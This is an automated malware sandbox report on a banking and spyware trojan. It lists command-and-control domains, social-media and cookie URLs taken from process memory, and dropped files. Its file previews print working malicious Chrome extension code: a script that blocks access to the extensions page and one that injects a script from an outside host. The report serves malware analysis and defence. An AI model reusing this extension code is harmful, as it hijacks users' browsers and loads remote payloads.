https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	0%	Avira URL Cloud	safe
http://C431A802FF4A46B5.com//	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	URL Reputation	safe
http://back19e64ea00d6ecfe1.io/info_old/ddd.	0%	Avira URL Cloud	safe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bdc347c728b2d94d.com	unknown	unknown	true	unknown
84b5a35d6e5335ef.com	unknown	unknown	true	unknown
61D53B5A4BC1AB86.com	unknown	unknown	true	unknown
C431A802FF4A46B5.com	unknown	unknown	true	unknown
9ED2FEEA30C3CC5D.com	unknown	unknown	true	unknown
61d53b5a4bc1ab86.com	unknown	unknown	true	unknown
9ed2feea30c3cc5d.com	unknown	unknown	true	unknown
back19e64ea00d6ecfe1.io	unknown	unknown	true	unknown
55BE681FC6760236.com	unknown	unknown	true	unknown
BDC347C728B2D94D.com	unknown	unknown	true	unknown
84B5A35D6E5335EF.com	unknown	unknown	true	unknown
55be681fc6760236.com	unknown	unknown	true	unknown
c431a802ff4a46b5.com	unknown	unknown	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://61d347c728b2d94d.com/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368374253.0000000000800000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate	ecv743B.tmp.11.dr	false		high
https://duckduckgo.com/chrome_newtab	Localwebdata1618257874860.6.dr	false		high
http://55BE681FC6760236.com/o/	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://BDC347C728B2D94D.com/_1;	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Localwebdata1618257874860.6.dr	false		high
https://www.messenger.com/	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://84b5a35d6e5335ef.com/info_old/w	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349232484.00000000007C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://back19e64ea00d6ecfe1.io/C	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com	ecv743B.tmp.11.dr	false		high
http://9ED2FEEA30C3CC5D.com/info_old/ddd9	26FF190E7AE0F7C7.exe, 00000006.00000003.421266635.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://back19e64ea00d6ecfe1.io/Y	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net	1618257864703.exe, 0000000B.00000002.385423543.0000000000198000.00000004.00000010.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://BDC347C728B2D94D.com/w	26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://back19e64ea00d6ecfe1.io/info_old/w	26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.383749465.0000000000779000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://61D53B5A4BC1AB86.com/ll	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://61D53B5A4BC1AB86.com/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.421765366.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/__media__/js/util/nrrV9140.js	ecv743B.tmp.11.dr	false		high
https://twitter.com/ookie:	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://55BE681FC6760236.com/o/H	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://BDC347C728B2D94D.com/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349232484.00000000007C1000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.381165044.00000000007A7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	ecv743B.tmp.11.dr	false	Avira URL Cloud: safe	unknown
https://twitter.comsec-fetch-dest:	26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z	ecv743B.tmp.11.dr	false	Avira URL Cloud: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f	ecv743B.tmp.11.dr	false		high
http://charlesproxy.com/ssl	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349991546.0000000000807000.00000004.00000001.sdmp	false		high
http://C431A802FF4A46B5.com//L	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/?ocid=iehp	ecv743B.tmp.11.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3	ecv743B.tmp.11.dr	false		high
http://C431A802FF4A46B5.com/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://C431A802FF4A46B5.com/p	26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/GTS1O1core.crl0	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://back19e64ea00d6ecfe1.io/	26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9	ecv743B.tmp.11.dr	false		high
http://back19e64ea00d6ecfe1.io/7	26FF190E7AE0F7C7.exe, 00000007.00000003.381165044.00000000007A7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net/	1618257864703.exe, 1618257864703.exe.6.dr	false		high
http://back19e64ea00d6ecfe1.io/6	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://84B5A35D6E5335EF.com/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://55be681fc6760236.com/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2	26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N	ecv743B.tmp.11.dr	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
https://www.instagram.com/	26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	download_user.dll.6.dr	false		high
http://www.xunlei.com/GET	download_user.dll.6.dr	false		high
http://61D53B5A4BC1AB86.com/	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee	ecv743B.tmp.11.dr	false		high
http://www.vb-cable.comVBCABLE	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	false	Avira URL Cloud: safe	unknown
https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c	ecv743B.tmp.11.dr	false		high
https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
https://www.messenger.com/origin:	26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Localwebdata1618257874860.6.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://670D67B00237B933.xyz/	26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	ecv743B.tmp.11.dr	false		high
https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml	ecv743B.tmp.11.dr	false		high
http://84b2feea30c3cc5d.com/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.357948935.00000000007F2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://support.goog	26FF190E7AE0F7C7.exe, 00000006.00000003.422617466.0000000003E82000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://61D53B5A4BC1AB86.com/info_old/w	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g	ecv743B.tmp.11.dr	false		high
https://contextual.media.net/	ecv743B.tmp.11.dr	false		high
https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie	ecv743B.tmp.11.dr	false		high
https://pki.goog/repository/0	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	ecv743B.tmp.11.dr	false	Avira URL Cloud: safe	unknown
https://670D67B00237B933.xyz/T	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://55BE681FC6760236.com/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.twitter.com/1.1/statuses/update.json	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msn	ecv743B.tmp.11.dr	false		high
http://9ede681fc6760236.com/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.350410684.00000000007F2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736	ecv743B.tmp.11.dr	false		high
https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9	ecv743B.tmp.11.dr	false		high
http://www.msn.com/	ecv743B.tmp.11.dr	false		high
https://upload.twitter.com/i/media/upload.json	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://BDC347C728B2D94D.com/o/	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734	ecv743B.tmp.11.dr	false		high
https://twitter.com/compose/tweetsec-fetch-mode:	26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://55BE681FC6760236.com/	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false		unknown
http://back19e64ea00d6ecfe1.io/h	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349697367.00000000007CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vb-cable.com	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	false	Avira URL Cloud: safe	unknown
http://BDC347C728B2D94D.com/info_old/dddn	26FF190E7AE0F7C7.exe, 00000006.00000003.422415280.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://BDC347C728B2D94D.com/info_old/w	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/accept:	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://back19e64ea00d6ecfe1.io/info_old/wJ	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://back19e64ea00d6ecfe1.io/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.422586817.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804	ecv743B.tmp.11.dr	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3	ecv743B.tmp.11.dr	false		high
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	ecv743B.tmp.11.dr	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/48/nrrV18753.js	ecv743B.tmp.11.dr	false		high
http://C431A802FF4A46B5.com//	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9	ecv743B.tmp.11.dr	false		high
http://back19e64ea00d6ecfe1.io/y	26FF190E7AE0F7C7.exe, 00000007.00000003.381285815.00000000007A3000.00000004.00000001.sdmp	false		unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pki.goog/gsr2/GTSGIAG3.crt0)	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://back19e64ea00d6ecfe1.io/info_old/ddd.	26FF190E7AE0F7C7.exe, 00000006.00000003.422586817.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://feedback.googleusercontent.com	26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	false		high
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385405
Start date:	12.04.2021
Start time:	13:02:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 30s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	SecuriteInfo.com.Trojan.Siggen12.33370.30028.25368 (renamed file extension from 25368 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal93.bank.troj.spyw.evad.winEXE@32/37@98/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 58.2% (good quality ratio 55.2%) Quality average: 80.4% Quality standard deviation: 27.4%
HCA Information:	Successful, ratio: 68% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 204.79.197.200, 13.107.21.200, 104.43.139.144, 52.147.198.201, 92.122.145.220, 205.185.216.42, 205.185.216.10, 13.64.90.137, 20.82.210.154, 92.122.213.247, 92.122.213.194 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, download.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:03:11	API Interceptor	16x Sleep call for process: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe modified
13:03:24	API Interceptor	13x Sleep call for process: 26FF190E7AE0F7C7.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	IpB8f8qwze.exe	Get hash	malicious	Browse
	IpB8f8qwze.exe	Get hash	malicious	Browse
	Setup.exe	Get hash	malicious	Browse
	Setup.exe	Get hash	malicious	Browse
	tyxCV1ouryr7.exe	Get hash	malicious	Browse
	aOn5CfTiwS.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\MSI429C.tmp	IpB8f8qwze.exe	Get hash	malicious	Browse
	IpB8f8qwze.exe	Get hash	malicious	Browse
	Setup.exe	Get hash	malicious	Browse
	Setup.exe	Get hash	malicious	Browse
	tyxCV1ouryr7.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	6MhmlD8KZh.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Cookies1618257864625 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6951152985249047
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
MD5:	EA7F9615D77815B5FFF7C15179C6C560
SHA1:	3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
SHA-256:	A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
SHA-512:	9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Cookies1618257873906 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6951152985249047
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
MD5:	EA7F9615D77815B5FFF7C15179C6C560
SHA1:	3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
SHA-256:	A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
SHA-512:	9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\background.js Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	886
Entropy (8bit):	5.022683940423506
Encrypted:	false
SSDEEP:	24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
MD5:	FEDACA056D174270824193D664E50A3F
SHA1:	58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
SHA-256:	8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
SHA-512:	2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
Malicious:	false
Preview:	$(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\book.js Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	152
Entropy (8bit):	5.039480985438208
Encrypted:	false
SSDEEP:	3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
MD5:	30CBBF4DF66B87924C75750240618648
SHA1:	64AF3DD53D6DED500863387E407F876C89A29B9A
SHA-256:	D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
SHA-512:	8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
Malicious:	false
Preview:	(function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\icon.png Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1161
Entropy (8bit):	7.79271055262892
Encrypted:	false
SSDEEP:	24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
MD5:	5D207F5A21E55E47FCCD8EF947A023AE
SHA1:	3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
